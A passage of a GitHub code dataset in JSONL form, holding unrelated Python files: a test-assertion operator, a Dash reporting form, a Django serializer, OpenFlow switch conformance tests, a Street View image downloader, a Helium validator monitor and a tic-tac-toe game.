blob.sentiment.polarity\n\n lastNoun = keyword;\n\n else:\n lastNoun = \"\"\n\n except Exception as e:\n print(e)\n\n print(entityDict)","repo_name":"Nikhil-Dreddy/Dena","sub_path":"TextblobShingles.py","file_name":"TextblobShingles.py","file_ext":"py","file_size_in_byte":1889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"18625229984","text":"# -*- coding: utf-8 -*-\nfrom array import array\nfrom six.moves import collections_abc\nimport six\n\nfrom ..operator import Operator\n\n\nclass ContainOperator(Operator):\n \"\"\"\n Asserts if a given value or values can be found\n in a another object.\n\n Example::\n\n # Should style\n 'foo bar' | should.contain('bar')\n ['foo', 'bar'] | should.contain('bar')\n ['foo', 'bar'] | should.contain('foo', 'bar')\n [{'foo': True}, 'bar'] | should.contain({'foo': True})\n\n # Should style - negation form\n 'foo bar' | should.do_not.contain('bar')\n ['foo', 'bar'] | should.do_not.contain('baz')\n\n # Expect style\n 'foo bar' | expect.to.contain('bar')\n ['foo', 'bar'] | expect.to.contain('bar')\n ['foo', 'bar'] | expect.to.contain('foo', 'bar')\n [{'foo': True}, 'bar'] | expect.to.contain({'foo': True})\n\n # Expect style - negation form\n 'foo bar' | expect.to_not.contain('bar')\n ['foo', 'bar'] | expect.to_not.contain('baz')\n \"\"\"\n\n # Is the operator a keyword\n kind = Operator.Type.MATCHER\n\n # Enable diff report\n show_diff = True\n\n # Operator keywords\n operators = ('contain', 'contains', 'includes')\n\n # Operator chain aliases\n aliases = ('value', 'item', 'string', 'text', 'expression', 'data')\n\n # Expected template message\n expected_message = Operator.Dsl.Message(\n 'a value that contains \"{value}\"',\n 'a value that does not contains \"{value}\"',\n )\n\n # Subject template message\n subject_message = Operator.Dsl.Message(\n 'a value of type \"{type}\" with content \"{value}\"',\n )\n\n # Stores types to normalize before the assertion\n NORMALIZE_TYPES = (\n collections_abc.Iterator,\n collections_abc.MappingView,\n collections_abc.Set,\n array\n )\n\n LIST_TYPES = (tuple, list, set, array)\n\n def match(self, subject, *values):\n if isinstance(subject, self.NORMALIZE_TYPES):\n subject = list(subject)\n elif isinstance(subject, collections_abc.Mapping):\n subject = list(subject.values())\n\n if not 
isinstance(subject, collections_abc.Sequence):\n return False, ['is not a valid sequence type']\n\n reasons = []\n\n if len(values) == 1 and isinstance(values[0], self.LIST_TYPES):\n values = list(values[0])\n\n for value in values:\n matches_any, reason = self._matches_any(value, subject)\n reasons.append(reason)\n\n if not matches_any:\n return False, [reason]\n\n return True, reasons\n\n def _matches_any(self, expected, subject):\n if len(subject) == 0:\n return False, 'empty item'\n\n if isinstance(subject, six.string_types):\n if expected in subject:\n return True, 'item {0!r} found'.format(expected)\n return False, 'item {0!r} not found'.format(expected)\n\n for item in subject:\n if item == expected:\n return True, 'item {0!r} found'.format(expected)\n\n return False, 'item {0!r} not found'.format(expected)\n","repo_name":"grappa-py/grappa","sub_path":"grappa/operators/contain.py","file_name":"contain.py","file_ext":"py","file_size_in_byte":3134,"program_lang":"python","lang":"en","doc_type":"code","stars":133,"dataset":"github-code","pt":"40"} +{"seq_id":"11039817410","text":"import dash_core_components as dcc\r\nimport dash_html_components as html\r\nfrom dash.dependencies import Input, Output, State\r\nimport dash_bootstrap_components as dbc\r\nimport datetime\r\nimport dash_table\r\n\r\nfrom Dash_App.app import app\r\nimport pandas as pd\r\n\r\nrow1 = html.Div(\r\n [\r\n dbc.Row([\r\n dbc.Col([\r\n dbc.Input(id=\"client_id\",\r\n type=\"text\",\r\n placeholder=\"Client ID\",\r\n style={'width': '150px'}),\r\n ]),\r\n\r\n dbc.Col([\r\n dbc.Input(id=\"profile_id\",\r\n type=\"text\",\r\n placeholder=\"Profile ID\",\r\n style={'width': '150px'}),\r\n ]),\r\n dbc.Col([\r\n dbc.Input(id=\"refresh_token\",\r\n type=\"text\",\r\n style={'width': '150px'},\r\n placeholder=\"Refresh Token\")\r\n ]),\r\n dbc.Col([\r\n dbc.Input(id=\"client_secret\",\r\n type=\"text\",\r\n style={'width': '150px'},\r\n placeholder=\"Client Secret\")\r\n ]),\r\n\r\n dbc.Col([\r\n dcc.Dropdown(\r\n id='dimensions',\r\n options=[{'label': i, 'value': i} for i in ['Campaign', 'Placement', 'Creative']],\r\n multi=True,\r\n style={'width': '150px'},\r\n placeholder='Dimensions')\r\n ]),\r\n\r\n dbc.Col([\r\n dcc.Dropdown(\r\n id='metrics',\r\n options=[{'label': i, 'value': i} for i in ['account_currency',\r\n 'account_id',\r\n 'account_name',\r\n ]],\r\n multi=True,\r\n style={'width': '150px'},\r\n placeholder='Metrics')\r\n ]),\r\n ], align=\"center\"),\r\n ], style={'margin-top': 20, 'margin-left': -90}\r\n)\r\n\r\nrow2 = html.Div([\r\n dbc.Row([\r\n # dbc.Col([\r\n # dcc.Dropdown(\r\n # id='breakdown',\r\n # options=[{'label': i, 'value': i} for i in ['ad_format_asset', 'age', 'body_asset',\r\n # 'call_to_action_asset', 'country',\r\n # ]], disabled=True,\r\n # multi=True,\r\n # style={'width': '250px'},\r\n # placeholder='Breakdown'),\r\n # ]),\r\n\r\n dbc.Col([\r\n dcc.DatePickerSingle(\r\n id='start-date',\r\n placeholder=\"Start Date\",\r\n min_date_allowed=datetime.datetime.now().strftime('2018-01-01'),\r\n max_date_allowed=datetime.datetime.today().date(),\r\n display_format='YYYY-MM-DD',\r\n style={'width': '150px', 'margin-left': 180}\r\n ),\r\n ]),\r\n dbc.Col([\r\n dcc.DatePickerSingle(\r\n id='end-date',\r\n placeholder=\"End Date\",\r\n min_date_allowed=datetime.datetime.now().strftime('2018-01-01'),\r\n max_date_allowed=datetime.datetime.today().date(),\r\n display_format='YYYY-MM-DD',\r\n style={'width': '150px', 'margin-left': 50}\r\n )]),\r\n ])\r\n])\r\n\r\nrow3 = html.Div([\r\n 
dbc.Row([\r\n dbc.Col([\r\n html.Button(id='submit-button', type='submit', children='Submit', style={'width': '150px', 'margin-top': 5,\r\n 'margin-left': 370}),\r\n\r\n ], width={\"order\": \"first\"}),\r\n dbc.Col([\r\n html.Div(id='output_div-dcm'),\r\n ])\r\n ])\r\n])\r\n\r\ntab_3_layout = dbc.Container(children=[\r\n row1,\r\n html.Br(),\r\n row2,\r\n html.Br(),\r\n row3,\r\n html.Br(),\r\n\r\n]\r\n)\r\n\r\n\r\n@app.callback(Output('output_div-dcm', 'children'),\r\n [Input('submit-button', 'n_clicks')],\r\n [State('client_id', 'value'),\r\n State('profile_id', 'value'),\r\n State('refresh_token', 'value'),\r\n State('client_secret', 'value'),\r\n State('dimensions', 'value'),\r\n State('metrics', 'value'),\r\n State('start-date', 'date'),\r\n State('end-date', 'date'),\r\n ],\r\n )\r\ndef dcm_output(clicks, client_id, profile_id, refresh_token, client_secret, dimensions, metrics, start_date, end_date):\r\n if clicks is not None:\r\n my_client_id = client_id\r\n my_profile_id = profile_id\r\n my_refresh_token = refresh_token\r\n my_client_secret = client_secret\r\n my_dimensions = dimensions\r\n my_metrics = metrics\r\n my_start_date = start_date\r\n my_end_date = end_date\r\n\r\n async_job = ''\r\n df = pd.DataFrame(async_job)\r\n dff = df['']\r\n html.Br()\r\n return html.Div([\r\n dash_table.DataTable(\r\n css=[{'selector': '.row',\r\n 'rule': 'margin: 0; white-space: inherit; overflow: inherit; text-overflow: inherit;'}],\r\n id='table',\r\n columns=[{\"name\": i, \"id\": i} for i in dff.columns],\r\n data=dff.to_dict(\"rows\"),\r\n export_format=\"csv\",\r\n style_cell={\"fontFamily\": \"Arial\", \"size\": 10, 'textAlign': 'left',\r\n 'width': '{}%'.format(len(dff.columns)), 'textOverflow': 'ellipsis', 'overflow': 'hidden'},\r\n\r\n style_table={'maxHeight': '200px', 'overflowY': 'scroll', 'maxWidth': '1500px', 'overflowX': 'scroll'},\r\n style_header={'backgroundColor': '#ffd480', 'color': 'white', 'height': '10', 'width': '10',\r\n 'fontWeight': 'bold'},\r\n style_data={'whiteSpace': 'auto', 'height': 'auto', 'width': 'auto'},\r\n tooltip_data=[\r\n {\r\n column: {'value': str(value), 'type': 'markdown'}\r\n for column, value in row.items()\r\n } for row in dff.to_dict('rows')\r\n ],\r\n tooltip_duration=None\r\n ),\r\n ], style={'margin-top': 30, 'display': 'inline-block', 'margin-left': 20, 'width': '100%'})\r\n","repo_name":"dharmen001/DashApp","sub_path":"tabs/DCM.py","file_name":"DCM.py","file_ext":"py","file_size_in_byte":6575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"32490186848","text":"from rest_framework import serializers\nfrom Post.models import Post\nfrom account.models import Account\nfrom Post.serializers import PostSerializer, UserSerializer\nfrom account.serializers import AccountSerializer\nfrom django.contrib.auth.models import User\nfrom .models import Notification\n\nclass GenericNotificationRelatedField(serializers.RelatedField):\n\n def to_representation(self, value):\n if isinstance(value, User):\n serializer = UserSerializer(value)\n if isinstance(value, Post):\n serializer = PostSerializer(value)\n\n return serializer.data\n\n\nclass NotificationSerializer(serializers.Serializer):\n actor = serializers.ReadOnlyField(source='actor.username')\n actor_account = AccountSerializer()\n recipient = serializers.ReadOnlyField(source='recipient.username')\n recipient_account = AccountSerializer()\n action_object_event = PostSerializer()\n unread = serializers.BooleanField(read_only=True)\n 
target = GenericNotificationRelatedField(read_only=True)\n verb = serializers.ReadOnlyField()\n\n class Meta:\n model = Notification\n fields = ('actor_account', 'verb', 'recipient_account', 'unread', 'target', 'action_object_event')\n\n def create(self, validated_data):\n return Notification.objects.create(**validated_data)","repo_name":"soncojmk/poppin","sub_path":"notifications/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7060710317","text":"\"\"\"\nhttps://www.hackerearth.com/zh/practice/data-structures/linked-list/singly-linked-list/practice-problems/algorithm/remove-friends-5/\n\"\"\"\n\nfrom collections import deque\n\nfor _ in range(int(input())):\n n, k = map(int, input().split())\n lst = list(map(int, input().split()))\n\n res = deque()\n for el in lst:\n while k > 0 and res and res[-1] < el:\n res.pop()\n k -= 1\n res.append(el)\n while k > 0:\n res.pop()\n k -= 1\n print(' '.join(map(str, res)))\n","repo_name":"ramo/competitive-programming-solutions","sub_path":"python/hackerearth/LinkedList/remove_friends_simple.py","file_name":"remove_friends_simple.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"37431985761","text":"#!/usr/bin/python\n\nimport stompy\n\nfrom lts.process_manager import ProcessWorker\n\nclass GCWorker(ProcessWorker):\n def run(self):\n stomp = stompy.simple.Client()\n stomp.connect()\n stomp.subscribe(\"/queue/cancel\", ack='auto')\n while True:\n m=stomp.get()\n self.jobDone()\n\nif __name__ == '__main__':\n stomp = stompy.simple.Client()\n stomp.connect()\n stomp.subscribe(\"/queue/cancel\", ack='auto')\n while True:\n m=stomp.get()\n","repo_name":"cnshot/CNShot","sub_path":"lts/task_gc.py","file_name":"task_gc.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"74423290999","text":"\"\"\"\r\nTest suite 80 checks OpenFlow protocol messages and their correct implementation. 
In\r\ncontrast to the basic checks, return values are checked for correctness, and configurations for\r\nfunctional implementation\r\n\"\"\"\r\n\r\nimport logging\r\n\r\nfrom oftest import config\r\nimport oftest.base_tests as base_tests\r\nimport ofp\r\n\r\nfrom oftest.testutils import *\r\n\r\n\r\n@group('standard')\r\nclass HelloWithoutBody(base_tests.SimpleProtocol):\r\n    \"\"\"\r\n    Verify OFPT_HELLO without body is accepted by the device\r\n\r\n    Test case 80.10: OFPT_HELLO without body\r\n    \"\"\"\r\n\r\n    def runTest(self):\r\n        request = ofp.message.hello()\r\n        self.controller.message_send(request)\r\n\r\n        response, _ = self.controller.poll(ofp.message.hello_failed_error_msg)\r\n        self.assertTrue(response is None,\r\n                        \"Hello Error message was received\")\r\n\r\n\r\n@group('standard')\r\nclass HelloWithBody(base_tests.SimpleProtocol):\r\n    \"\"\"\r\n    Verify OFPT_HELLO with body is accepted by the device\r\n\r\n    Test case 80.20: OFPT_HELLO with body\r\n    \"\"\"\r\n\r\n    def runTest(self):\r\n        msg = ofp.message.echo_request()\r\n        msg.xid = 213\r\n        request = ofp.message.hello(elements=[msg])\r\n        self.controller.message_send(request)\r\n\r\n        response, _ = self.controller.poll(ofp.message.hello_failed_error_msg)\r\n        self.assertTrue(response is None,\r\n                        \"Hello Error message was received\")\r\n\r\n\r\n@group('standard')\r\nclass ErrorMessage(base_tests.SimpleProtocol):\r\n    \"\"\"\r\n    Verify basic error message type is implemented\r\n\r\n    Test case 80.30: OFPT_ERROR\r\n    \"\"\"\r\n\r\n    def runTest(self):\r\n        request = ofp.message.hello()\r\n        # change hello message version to incorrect number\r\n        request.version = ofp.OFP_VERSION - 1\r\n        self.controller.message_send(request)\r\n\r\n        response, _ = self.controller.poll(ofp.message.hello_failed_error_msg)\r\n        self.assertTrue(response is not None,\r\n                        \"No Error message was received\")\r\n        self.assertTrue(response.code == ofp.OFPHFC_INCOMPATIBLE,\r\n                        \"Hello Error with reason Version INCOMPATIBLE was not received\")\r\n\r\n\r\n@group('standard')\r\nclass EchoWithoutBody(base_tests.SimpleProtocol):\r\n    \"\"\"\r\n    Test echo response with no data\r\n\r\n    Test case 80.40: Verify Echo Reply messages are implemented\r\n    \"\"\"\r\n\r\n    def runTest(self):\r\n        request = ofp.message.echo_request()\r\n        response, pkt = self.controller.transact(request)\r\n        self.assertTrue(response is not None,\r\n                        \"Did not get echo reply\")\r\n        self.assertEqual(response.type, ofp.OFPT_ECHO_REPLY,\r\n                         'response is not echo_reply')\r\n        self.assertEqual(request.xid, response.xid,\r\n                         'response xid != request xid')\r\n        self.assertEqual(len(response.data), 0, 'response data non-empty')\r\n\r\n\r\n@group('standard')\r\nclass EchoWithBody(base_tests.SimpleProtocol):\r\n    \"\"\"\r\n    Test echo response with short string data\r\n    \"\"\"\r\n\r\n    def runTest(self):\r\n        data = 'OpenFlow Will Rule The World'\r\n        request = ofp.message.echo_request(data=data)\r\n        response, _ = self.controller.transact(request)\r\n        self.assertTrue(response is not None,\r\n                        \"Did not get echo reply\")\r\n        self.assertEqual(response.type, ofp.OFPT_ECHO_REPLY,\r\n                         'response is not echo_reply')\r\n        self.assertEqual(request.xid, response.xid,\r\n                         'response xid != request xid')\r\n        self.assertEqual(request.data, response.data,\r\n                         'response data != request data')\r\n\r\n\r\n@group('standard')\r\nclass FeaturesRequestReply(base_tests.SimpleProtocol):\r\n    \"\"\"\r\n    Verify OFPT_FEATURES_REQUEST / Reply dialogue\r\n\r\n    Derived from Test case 80.60: Features Request-Reply\r\n    \"\"\"\r\n\r\n    def runTest(self):\r\n        request = 
ofp.message.features_request()\r\n response, _ = self.controller.transact(request)\r\n self.assertTrue(response is not None,\r\n 'Did not get features reply')\r\n self.assertEqual(request.xid, response.xid,\r\n 'response xid != request xid')\r\n\r\n\r\n@group('standard')\r\nclass FeaturesReply(base_tests.SimpleProtocol):\r\n \"\"\"\r\n Verify OFPT_FEATURES_REPLY contains complete feature information\r\n\r\n Derived from Test case 80.70: Features Reply\r\n \"\"\"\r\n\r\n def runTest(self):\r\n request = ofp.message.features_request()\r\n response, _ = self.controller.transact(request)\r\n self.assertTrue(response is not None,\r\n 'Did not get features reply')\r\n self.assertEqual(request.xid, response.xid,\r\n 'response xid != request xid')\r\n self.assertTrue(response.capabilities is not None,\r\n \"No features are supported\")\r\n\r\n\r\n\r\n@group('standard')\r\nclass OFPC_FLOW_STATS(base_tests.SimpleProtocol):\r\n \"\"\"\r\n Verify OFPT_FEATURES_REPLY for Flow statistics support\r\n \"\"\"\r\n\r\n def runTest(self):\r\n request = ofp.message.features_request()\r\n response, _ = self.controller.transact(request)\r\n self.assertTrue(response is not None,\r\n 'Did not get features reply')\r\n self.assertEqual(request.xid, response.xid,\r\n 'response xid != request xid')\r\n self.assertNotEqual(response.capabilities & ofp.OFPC_FLOW_STATS, 0,\r\n \"OFPC_FLOW_STATS is not supported\")\r\n\r\n\r\n@group('standard')\r\nclass OFPC_TABLE_STATS(base_tests.SimpleProtocol):\r\n \"\"\"\r\n Verify OFPT_FEATURES_REPLY for Table statistics support\r\n \"\"\"\r\n\r\n def runTest(self):\r\n request = ofp.message.features_request()\r\n response, _ = self.controller.transact(request)\r\n self.assertTrue(response is not None,\r\n 'Did not get features reply')\r\n self.assertEqual(request.xid, response.xid,\r\n 'response xid != request xid')\r\n self.assertNotEqual(response.capabilities & ofp.OFPC_TABLE_STATS, 0,\r\n \"OFPC_TABLE_STATS is not supported\")\r\n\r\n\r\n@group('standard')\r\nclass OFPC_PORT_STATS(base_tests.SimpleProtocol):\r\n \"\"\"\r\n Verify OFPT_FEATURES_REPLY for Port statistics support\r\n \"\"\"\r\n\r\n def runTest(self):\r\n request = ofp.message.features_request()\r\n response, _ = self.controller.transact(request)\r\n self.assertTrue(response is not None,\r\n 'Did not get features reply')\r\n self.assertEqual(request.xid, response.xid,\r\n 'response xid != request xid')\r\n self.assertNotEqual(response.capabilities & ofp.OFPC_PORT_STATS, 0,\r\n \"OFPC_PORT_STATS is not supported\")\r\n\r\n\r\n@group('standard')\r\nclass OFPC_IP_REASM(base_tests.SimpleProtocol):\r\n \"\"\"\r\n Verify OFPT_FEATURES_REPLY for IP packet reassembly\r\n \"\"\"\r\n\r\n def runTest(self):\r\n request = ofp.message.features_request()\r\n response, _ = self.controller.transact(request)\r\n self.assertTrue(response is not None,\r\n 'Did not get features reply')\r\n self.assertEqual(request.xid, response.xid,\r\n 'response xid != request xid')\r\n if response.capabilities & 0x20:\r\n logging.info(\"OFPC_IP_REASM is supported\")\r\n else:\r\n logging.info(\"OFPC_IP_REASM is not supported\")\r\n\r\n\r\n@group('standard')\r\nclass ConfigGet(base_tests.SimpleProtocol):\r\n \"\"\"\r\n Verify that a basic Get Config Request does not generate an error.\r\n \"\"\"\r\n\r\n def runTest(self):\r\n request = ofp.message.get_config_request()\r\n response, _ = self.controller.transact(request)\r\n self.assertTrue(response is not None,\r\n \"No response to get config request\")\r\n self.assertTrue(response.flags is not None,\r\n 
\"Config reply has flags\")\r\n\r\n\r\n@group('standard')\r\nclass ConfigGetMissSendLen(base_tests.SimpleProtocol):\r\n \"\"\"\r\n Check OFPT_GET_CONFIG_REPLY value for No special handling for fragments\r\n \"\"\"\r\n\r\n def runTest(self):\r\n request = ofp.message.get_config_request()\r\n response, _ = self.controller.transact(request)\r\n logging.info(response.show())\r\n self.assertTrue(response is not None,\r\n \"No response to get config request\")\r\n\r\n\r\n@group('standard')\r\nclass ConfigSetMissSendLen(base_tests.SimpleProtocol):\r\n \"\"\"\r\n Verify implementation of OFPT_SET_CONFIG - miss_send_len\r\n \"\"\"\r\n\r\n def setUp(self):\r\n base_tests.SimpleProtocol.setUp(self)\r\n request = ofp.message.get_config_request()\r\n response, _ = self.controller.transact(request)\r\n self.miss_send_len = response.miss_send_len\r\n\r\n def runTest(self):\r\n request = ofp.message.set_config(miss_send_len=111)\r\n self.controller.message_send(request)\r\n\r\n request = ofp.message.get_config_request()\r\n response, _ = self.controller.transact(request)\r\n self.assertTrue(response is not None,\r\n \"No response to get config request\")\r\n self.assertEqual(response.miss_send_len, 111,\r\n \"Can't set the field miss_send_len\")\r\n\r\n def tearDown(self):\r\n request = ofp.message.set_config(miss_send_len=self.miss_send_len)\r\n self.controller.message_send(request)\r\n base_tests.SimpleProtocol.tearDown(self)\r\n\r\nclass OFPT_PACKET_OUT(base_tests.SimpleDataPlane):\r\n \"\"\"\r\n Verify Controller is able to use the OFPT_PACKET_OUT message\r\n to send a packet out of one of the DUT ports\r\n \"\"\"\r\n\r\n def runTest(self):\r\n pkt = str(simple_tcp_packet())\r\n\r\n for of_port in config[\"port_map\"].keys():\r\n msg = ofp.message.packet_out(\r\n in_port=ofp.OFPP_CONTROLLER,\r\n actions=[ofp.action.output(port=of_port)],\r\n buffer_id=ofp.OFP_NO_BUFFER,\r\n data=pkt)\r\n\r\n logging.info(\"PacketOut test, port %d\", of_port)\r\n self.controller.message_send(msg)\r\n verify_packets(self, pkt, [of_port])\r\n\r\n\r\n@group('standard')\r\nclass BarrierRequest(base_tests.SimpleProtocol):\r\n \"\"\"\r\n Verify that a basic barrier request does not generate an error.\r\n \"\"\"\r\n\r\n def runTest(self):\r\n request = ofp.message.barrier_request()\r\n response, _ = self.controller.transact(request)\r\n self.assertTrue(response is not None,\r\n \"No response to Barrier Request\")\r\n\r\n\r\n@group('standard')\r\nclass AsyncConfigGet(base_tests.SimpleProtocol):\r\n \"\"\"\r\n Verify initial async config\r\n\r\n Other tests rely on connections starting with these values.\r\n \"\"\"\r\n\r\n def runTest(self):\r\n logging.info(\"Sending get async config request\")\r\n response, _ = self.controller.transact(ofp.message.async_get_request())\r\n self.assertTrue(response != None, \"No response to get async config request\")\r\n logging.info(response.show())\r\n self.assertEquals(response.packet_in_mask_equal_master & 0x07, 0x07)\r\n self.assertEquals(response.port_status_mask_equal_master & 0x07, 0x07)\r\n self.assertEquals(response.flow_removed_mask_equal_master & 0x0f, 0x0f)\r\n","repo_name":"xuchen1992/oftest","sub_path":"tests-1.3/messages.py","file_name":"messages.py","file_ext":"py","file_size_in_byte":11317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"44269885148","text":"import google_streetview.api\nimport google_streetview.helpers\nimport csv\nimport os \n \ndef get_request_gsv(locations, name):\n #Parameters\n param = {\n 
'size': '640x640', # max 640x640 pixels\n 'location': locations, # accepts string of locations seperated by ; \n 'fov': '50', # field of view \n 'radius': '5', # radius in meters for image around the location\n 'pitch': '12', # ptich of the camera 0 = ground level\n 'source': 'outdoor', # source of the SV image 'default' = indoor and outdoor SV images\n 'key': 'YOUR_OWN_API_KEY' # API key used to get images from GSV\n }\n\n api_list = google_streetview.helpers.api_list(param)\n\n results = google_streetview.api.results(api_list)\n \n #Downloading images to a new folder with metadeta\n results.download_links('class_{}'.format(name))\n\n#Opening the .csv files with the locations\nfor file in os.listdir(\"TO/YOUR/LOCATIONS/DIR\"):\n with open(\"YOUR/LOCATION/\" + file, 'r') as f:\n next(f) # skip header line\n locs = ';'.join(f) # join the locations with ; string format\n get_request_gsv(locs, file) \n","repo_name":"meesve/AI_BachelorProject","sub_path":"DATA_REQUEST/get_request_GSV.py","file_name":"get_request_GSV.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"25150688544","text":"import time, yaml, logger, schedule\nfrom helium import get_validator_status\nfrom dotenv import load_dotenv\nfrom os import path, getenv\nfrom discord import send_status_message\n\nload_dotenv()\nSTATUS_CHECK_DELAY_SECONDS = int(getenv('STATUS_CHECK_DELAY_SECONDS'))\nPERIODIC_CHECK_DELAY_MINUTES = int(getenv('PERIODIC_CHECK_DELAY_MINUTES'))\nENABLE_PERIODIC_CHECK = bool(getenv('ENABLE_PERIODIC_CHECK'))\n\nlog = logger.get_logger(__name__)\nvalidators = None\nlog.info('Validator status will be checked every {} seconds'.format(STATUS_CHECK_DELAY_SECONDS))\n\ndef get_validators():\n \"\"\"\n Load the validators from the validtors.yaml file and return them as a list.\n \"\"\"\n\n basepath = path.dirname(__file__)\n filepath = path.abspath(path.join(basepath, \"..\", \"validators.yaml\"))\n log.debug(\"Loading validators from {}\".format(filepath))\n\n with open(filepath, 'r') as f:\n data = yaml.full_load(f)\n\n for validator in data['validators']:\n validator['explorer'] = f'https://explorer.helium.com/validators/{validator[\"address\"]}'\n\n global validators\n validators = data['validators']\n\n\ndef periodic_check():\n \"\"\"\n Periodically does a status check and always sends a message\n to discord, regardless of what the status is\n \"\"\"\n \n log.debug(\"Executing periodic check\")\n check_status(is_periodic=True)\n\ndef check_status(is_periodic=False):\n \"\"\"\n Check the status of each validator and send a message to discord if it is offline.\n \"\"\"\n\n try:\n if validators is None:\n get_validators()\n\n for validator in validators:\n name = validator['name']\n explorer = validator['explorer']\n status = get_validator_status(validator['address'])\n\n if is_periodic:\n send_status_message(name, explorer, status)\n elif status != 'online':\n log.warn(\"Validator {} is offline\".format(name))\n send_status_message(name, explorer, status)\n else: \n log.info(\"Validator {} is online\".format(validator['name']))\n\n except Exception:\n log.exception(\"Error checking validator status\")\n\n# Schedule status check\nschedule.every(STATUS_CHECK_DELAY_SECONDS).seconds.do(check_status)\n\n# Schedule periodic check only if enabled\nif ENABLE_PERIODIC_CHECK:\n schedule.every(PERIODIC_CHECK_DELAY_MINUTES).minutes.do(periodic_check)\n\nwhile True:\n schedule.run_pending()\n 
time.sleep(1)","repo_name":"Spareo/helium-validator-monitor","sub_path":"helium-validator-monitor/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40324007541","text":"from random import randint\n\n\nc = 3\nr = 3\n#x = [ [0] * c for i in range(r) ] old stuff\n#y = [ [0] * c for i in range(r) ]\ntaken = [ [0] * c for i in range(r) ]\nturn = 1\nturnCounter = 0\nglobal gameStart\ngameStart = True\nki_an = False\nnotplayer='y'\n\ndef checkwin(player):#checks if active player wins\n global gameStart\n for i in range(0,c): # Counting \"player\" in colum\n points = 0\n for ii in range(0,r):\n if taken[i][ii] == player:\n points += 1\n if points >= 3:\n updateWIN(player)\n gameStart = False\n for ii in range(0,c): # Counting \"player\" in ROW\n points = 0\n for i in range(0,r):\n if taken[i][ii] == player:\n points += 1\n if points >= 3:\n updateWIN(player)\n gameStart = False\n if taken[0][0] == player and taken[1][1] == player and taken[2][2] == player: # WIN condition top left middle bottom right\n updateWIN(player)\n gameStart = False\n if taken[0][2] == player and taken[1][1] == player and taken[2][0] == player: # WIN condition top right middle bottom left\n gameStart = False \n updateWIN(player)\n return True\ndef playermove(turn):#changes the turn order\n global notplayer\n global player\n\n if (turn==1):\n turn = turn *-1\n print(\"x's turn\")\n Set('x')\n notplayer = 'y'\n player = 'x'\n return turn\n else:\n turn = turn *-1\n print(\"y's turn\")\n Set('y')\n notplayer = 'x'\n player = 'y'\n return turn\ndef clearscreen():#\"clears\" the terminal\n print(\"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\")\ndef Set(player):#sets the players symbol\n if ki_an == True:\n if turn == 1:\n KeyInput=input()\n if KeyInput.isdigit():\n keyCheck(KeyInput, player)\n else:\n print(\"Wrong Input\")\n Set(player)\n\n else:\n KeyInput=randint(0,9) #massive KI\n keyCheck(KeyInput, player)\n else: \n KeyInput=input()\n keyCheck(KeyInput, player)\ndef printBoard():#prints the board on call\n iii=0\n print(\"----------\")\n for i in range(0,r):\n for ii in range(0,c):\n iii+=1\n if taken[i][ii]!='x' and taken[i][ii]!='y':\n taken[i][ii]=iii\n print(taken[i][0],'|',taken[i][1],'|',taken[i][2])\n print(\"----------\")\ndef updateWIN(player):#reset screen when a player wins and prints the final set\n clearscreen()\n printBoard()\n print(player, \"wins\")\ndef keyCheck(KeyInput, player):#checking a int\n global taken\n if int(KeyInput) >=1 and int(KeyInput) <= 9:\n if taken[(int(KeyInput)-1)//3][(int(KeyInput)-1)%3] != 'x' and taken[(int(KeyInput)-1)//3][(int(KeyInput)-1)%3]!= 'y':\n taken[(int(KeyInput)-1)//3][(int(KeyInput)-1)%3]=player\n global turnCounter\n turnCounter += 1\n else:\n print(\"Wrong Input\")\n Set(player)\n else:\n print(\"Wrong Input\")\n Set(player) \ndef calcMove(player, notplayer):\n global bestmovex\n global bestmovey\n global bestmovex2\n global bestmovey2\n for i in range(0,r): # Counting \"player\" in colum\n points = 0\n for ii in range(0,c):\n if taken[i][ii] == player and taken[i][ii] != notplayer:\n points += 1\n else:\n bestmovex = i\n bestmovey = ii\n if points == 2 and taken[bestmovex][bestmovey]:\n print(\"finish row\",bestmovex,bestmovey,player)\n break\n\n for ii in range(0,r): # Counting \"player\" in ROW\n points = 0\n for i in range(0,c):\n if taken[i][ii] == player and taken[i][ii] != notplayer:\n points += 1\n else:\n bestmovex2 = ii\n 
bestmovey2 = i\n            if points == 2 :\n                print(\"finish colum\",bestmovex2,bestmovey2,player )\n                break\n    return True\n\nwhile gameStart:\n    clearscreen()\n    printBoard()\n    if turnCounter >= 9: #if after 9 turns there is no winner its a draw\n        gameStart = False\n        print(\"Draw\")\n    if gameStart == True:#if the game is running let a player make a move\n        turn = playermove(turn)\n        calcMove(player, notplayer)\n        checkwin('x') \n        checkwin('y') \n#playerturns","repo_name":"psyConteX/TicTacLearn","sub_path":"test2.py","file_name":"test2.py","file_ext":"py","file_size_in_byte":4464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
